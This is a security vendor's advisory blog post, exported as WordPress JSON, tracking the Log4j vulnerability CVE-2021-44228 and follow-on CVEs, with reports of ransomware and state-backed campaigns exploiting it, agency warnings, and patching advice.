{"id":7241,"date":"2022-08-30T07:47:45","date_gmt":"2022-08-30T14:47:45","guid":{"rendered":"https:\/\/webdev.securin.xyz\/?p=7241"},"modified":"2023-05-02T15:15:00","modified_gmt":"2023-05-02T22:15:00","slug":"have-you-patched-the-apache-log4j-vulnerability-cve-2021-44228-2","status":"publish","type":"post","link":"https:\/\/webdev.securin.xyz\/articles\/have-you-patched-the-apache-log4j-vulnerability-cve-2021-44228-2\/","title":{"rendered":"Have you Patched the Apache Log4j vulnerability CVE-2021-44228?"},"content":{"rendered":"\t\t
Apache Log4j vulnerability CVE-2021-44228 is a critical zero-day code execution vulnerability with a CVSS base score of 10. On December 9, 2021, the Internet was set on fire when an exploit was posted publicly for Apache Log4J – a well-known logging utility in the Java programming language.<\/p>
The implications of Log4j are going to have a very long tail! Leaders need to continue to verify which of their systems are impacted and continuously check for updates to make sure they are completely patched. Continuous scanning has been the most effective method that we’ve seen success with.<\/p>
-Aaron Sandeen, CEO of Securin<\/p><\/blockquote>
How this incident unfold?<\/strong><\/a>\u00a0|\u00a0Timeline<\/strong><\/a> | <\/strong>Securin’s POC Exploit<\/a>\u00a0 |\u00a0Get our Detection Script<\/a> | IOCs<\/a> | Our Analysis<\/a> | Vulnerable Products<\/a><\/strong><\/p>
<\/p>
Recent Developments<\/h2>
APT MuddyWater Association: <\/strong>Iranian APT group MuddyWater joins the Log4j bandwagon, continuing the long-tail impact of the vulnerability that first made waves in December 2021.<\/p>
APT Lazarus Association:<\/strong> On May 23, 2022, Lazarus, a group associated with North Korea, exploits Log4J’s RCE vulnerability (CVE-2021-44228) to gain access to VMware Horizon servers. As part of the attack chain, a PowerShell command is executed on VMware Horizon’s ws_tomcatservice.exe process in order to exploit the Log4j vulnerability. This PowerShell command installs the NukeSped backdoor on the vulnerable server. Users are recommended to check for firmware updates for Log4Shell vulnerabilities and apply the patches.<\/p>
Fire Chili Malware:<\/strong> On April 01, 2022, a Chinese hacker group Deep Panda is deploying a new rootkit malware named Fire Chili on VMware Horizon servers using the Log4Shell exploit. Researchers uncovered several overlaps between the Deep Panda campaign and Winnti, another notorious Chinese hacker group known for using digitally signed certificates.\u00a0 On February 18, 2022, researchers observed that Iran-linked APT group TunnelVision was actively exploiting the Log4j vulnerability to deliver ransomware to unpatched VMware Horizon servers.<\/p>
Ubiquiti Network Targeted: <\/strong>It is found that Ubiquiti network appliances running the UniFi operating system are being attacked and taken over by threat actors using a customized public exploit for the Log4Shell vulnerability, on February 04, 2022.<\/p>
Night Sky Ransomware: <\/strong>The Night Sky ransomware gang has begun to attack the major CVE-2021-44228 vulnerability in the Log4j logging library to get access to VMware Horizon computers. Night Sky ransomware targets organization networks and has encrypted the data of many victims and demanded $800,000 in ransom from one of them.<\/p>
On January 10, 2022, Microsoft has issued a warning on a new campaign by a China-based attacker known as DEV-0401 that aims to exploit the Log4Shell vulnerability on publicly accessible VMware Horizon servers and install the Night Sky ransomware.<\/p>
US Federal Trade Commission Warning:<\/strong> On January 05, 2022, the US Federal Trade Commission warned<\/a> that it will take action against any US company not protecting its customers’ information from ongoing Log4J attacks. It’s vital that firms and their vendors who use Log4j act quickly to decrease the risk of consumer harm and prevent FTC legal action.<\/p>
After noticing state-sponsored and cyber-criminal attackers investigating systems for the LogShell weakness in December, Microsoft has issued<\/a> a warning to Windows and Azure customers users to be careful.<\/p>
ONUS Falls Victim: <\/strong>ONUS, a crypto trading platform, suffered a cyberattack on its payment system, which was running a vulnerable Log4j version. Threat actors put roughly 2 million ONUS customers’ data up for sale on dark forums after the firm refused to pay the ransom of $5 million.\u00a0 According to researchers, ONUS’s Cyclos server was exploited by threat actors between December 11th and 13th, and backdoors were planted to allow sustained access. We recommend users upgrade to the newest version of Log4j 2.17.1.<\/p>
According to CrowdStrike researchers, a Chinese hacker group known as AQUATIC PANDA famous for industrial espionage and intelligence collection exploited a Log4j vulnerability to target a significant academic institution.<\/p>
Log4shell Fifth Vulnerability: <\/strong>On December 29, 2021, Apache discovered<\/a> its fifth vulnerability in Log4j 2.17.0 – an RCE flaw assigned a CVE Identifier as CVE-2021-44832, for which a patch is now available. Two different weaknesses in code can be exploited using this vulnerability, classified under CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component ) and CWE-20 (Improper Input Validation).<\/p>
PoC Released: <\/strong>On December 25, 2021, Securin Researchers have developed a Proof-of-Concept<\/a> exploit for CVE-2021-44228 Log4j vulnerability.<\/p>
Note: <\/strong>This is not a “point and click” exploit. The initial trigger payload will be generated; however, the user will be responsible for injecting it into the appropriate location (i.e., HTTP header\/chat\/etc.).<\/p>
CISA, NSA & FBI: <\/strong>The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the National Security Agency (NSA), and other cybersecurity agencies from Australia, New Zealand, and the United Kingdom, on December 24, 2021, have issued a joint Cybersecurity Advisory (CSA) to provide mitigating measures to address.<\/p>
Additionally, CISA has launched a scanner utility to discover systems that are vulnerable to the Log4J Shell vulnerability, comparable to the CERT Coordination Center (CERT\/CC) tool.<\/p>
Belgian Defense Ministry Targeted:<\/strong> On December 22, 2021, the Belgian defense ministry experienced a breach on its computer networks as a result of unpatched log4j servers, which clearly demonstrates the lack of cyber hygiene. In spite of knowing of the security hole and the significant risk posed to corporate networks around the world, organizations continue to fail to heed the warnings that can eventually lead to major cyberattacks. We, therefore, urge users to patch their Apache servers immediately.<\/p>
LogShell’s Fourth Vector\u00a0<\/strong><\/p>
{Updated on December 21}: Unsurprisingly, here comes another new RCE vulnerability (CVE-2021-4104) that affects Log4j v1.2 instances using the JMSAppender, which will not be fixed because the 1.x branch has reached end-of-life. CVE-2021-4104 has a severity of\u00a0 8.1 (high) on the CVSS v3 scale and is classified as CWE-502 vulnerable to deserialization of untrusted data.<\/p>
Multiple threat actors are now taking advantage of the Apache Log4j vulnerabilities to infect affected Windows devices, with the latest attacks using the Dridex banking malware or Meterpreter. Dridex infections have also been connected to ransomware attacks carried out by the Evil Corp hacking gang activity.<\/p>
The US government cybersecurity agency issued an Emergency Directive 22-02<\/a>, urging other federal agencies to identify susceptible Log4j systems and deploy the necessary patches and mitigations by 5 p.m. on December 23, 2021.<\/p>
LogShell\u2019s DoS Vector Patched<\/strong><\/p>
{Updated on December 18}: Apache pushed another fix for the DoS vector of the second log4j flaw, which is now tracked as CVE-2021-45105. This CVE carries a CVSS score of 7.5 (high) that impacts all versions from 2.0-beta9 to 2.16.0. We urge Apache users to apply the latest patch release of 2.17.0.<\/p>
Earlier, Conti Ransomware was found to be venturing laterally on vulnerable VMware vCenter servers, revealing the first major gang known to weaponize the log4j vulnerability.<\/p>
In addition, researchers in China discovered an old inactive ransomware family named TellYouThePass being used in attacks against Windows and Linux computers to exploit the severe remote code execution flaw in the Apache Log4j modules.<\/p>
The never-ending, incomplete fix pattern for the LogShell vulnerabilities continues to discover newer loopholes. We will now have to wait and watch how the latest release holds up.<\/p>
{Updated on December 17}: Praetorian researchers warned of a third independent flaw in Log4j version 2.15.0 that might allow sensitive data to be exfiltrated in certain instances. To avoid future exploitation, more technical details about the vulnerability have been concealed; however, it’s unclear whether this has already been resolved in version 2.16.0.<\/p>
The second Log4j vulnerability (CVE-2021-45046) that was initially rated CVSS v3 score of 3.7 (medium) has been bumped up to 9.0 (critical). Since researchers have developed exploits that could lead to Information leaks, Remote Code Execution, and Local Privilege Escalation. Therefore, Apache has labelled the CVE to Remote Code Execution from Denial of Service attacks.<\/p>
Considering Khonsari ransomware and threat groups such as Nemesis Kitten, Hafnium, and Phosphorus are looking for an opportunity to make the most of the critical vulnerability, we urge organizations to employ mitigations and patch the vulnerable systems on priority to reduce the impact of Log4j vulnerability on their systems.<\/p>
A New Ransomware: <\/strong>On December 15, 2021, a new ransomware family specifically targeting Windows Servers, dubbed as Khonsari, has been observed exploiting the vulnerability CVE-2021-44228. The most troubling aspect is its direct deployment of ransomware using the Log4jShell (CVE-2021-44228) vulnerability. Another Iran-based state-sponsored threat actor, Nemesis Kitten, was also seen leveraging the vulnerability in an attack.<\/p>
Furthermore, Advanced Persistent Threat groups from China, Iran, North Korea, and Turkey, including Hafnium and Phosphorus, have stepped into the battle to operationalize the vulnerability and find and exploit as many vulnerable systems as possible.<\/p>
{December 15}:<\/strong> A second vulnerability involving Apache Log4j was discovered and is tracked as CVE-2021-45046, rated 3.7\/10 (low) on the CVSS scale. This vulnerability emerges from the incomplete patch to the CVE-2021-44228 that leads attackers to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack.<\/p>
CVE 2021-45046 is categorized under the weakness enumeration CWE-502 (Deserialization of Untrusted Data). Though it has a low severity, the CWE assigned to it is listed in the Top 15 most dangerous software weaknesses published by MITRE.<\/a><\/p>
Apache has already released an updated version<\/a> of Log4j 2.16.0 for this issue and urges users to apply the necessary patches.<\/p>
<\/a>Apache Log4J Vulnerability<\/h2>
CVE-2021-44228 is a critical java-based zero-day vulnerability that exists in the Java logging framework of Apache Software Foundation. This unauthenticated RCE vulnerability allows the attacker full control of the affected server if the user-controlled string is logged.<\/p>
This zero-day vulnerability came to light on December 9, 2021, when a security researcher shared an exploit for this unknown bug on Twitter. Since then, a CVE number has been assigned to it and the vulnerability is trending in the wild with many exploits being posted. The exploit enables remote code execution of this vulnerability facilitating a complete take over of the server.<\/p>
<\/p>
<\/a>Our Analysis<\/h2>
CVE-2021-44228 is a Remote Code Execution vulnerability in the Apache Log4j with over 400,000 downloads from its GitHub project.<\/p><\/li>
This CVE is classified under the weaknesses enumerations of CWE – 502, CWE-400, and CWE-20, that fall under the 2021 Top 30 dangerous software weaknesses<\/a> listed by MITRE.<\/p><\/li>
The first alert was released by CERT New Zealand<\/a>, followed by those from CISA<\/a> and the National Cyber Security Centre of the United Kingdom<\/a>.<\/p><\/li>
According to researchers, botnets such as Mirai and Muhstik (aka Tsunami) are targeting vulnerable systems to deploy cryptocurrency miners and setting up backdoors to Linux systems, leading to DDoS attacks.<\/p><\/li>
Popular scanners such as Qualys, Nessus, and Nexpose were able to detect the CVE-2021-44228 vulnerability and have been assigned with the following plugin IDs.<\/p><\/li><\/ul>
<\/p>
<\/a>Vulnerable Products {Updated on April 7, 2022}<\/h2>
This vulnerability affects everything from enterprise software to web applications and popular consumer products. In a nutshell, if an organization is using the Apache Log4j framework (including Apache Struts2, Apache Solr, Apache Druid, Apache Flink, etc.) then they are vulnerable to CVE-2021-44228.<\/p>
In our initial analysis of Log4j vulnerable products, we found only 273 impacted products which have now grown to 1888. Our Securin analysts are keeping up-to-date on the affected products and updating the following list on a daily basis.<\/p>
<\/p>